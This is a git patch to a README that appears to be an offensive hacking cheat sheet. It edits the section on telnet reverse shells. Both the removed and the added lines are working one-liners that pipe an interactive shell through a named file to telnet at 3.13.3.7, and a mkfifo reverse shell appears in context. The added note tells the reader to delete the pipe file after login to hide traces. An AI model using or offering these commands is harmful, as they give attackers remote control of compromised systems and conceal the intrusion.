From f240f9374fb34b30e5693f4cc83138d7d9b76556 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 12 Oct 2023 11:19:37 +0100 Subject: [PATCH] Update README.md --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4a30392..aac3248 100644 --- a/README.md +++ b/README.md @@ -1187,10 +1187,9 @@ mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io Telnet variant when mkfifo is not supported (Ulg!): ```sh -({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ); -tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio +touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio ``` -Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. +Note: Dont forget to `rm /tmp/.fio` after login. **5.i.g. Reverse shell with remote.moe and ssh (encrypted)**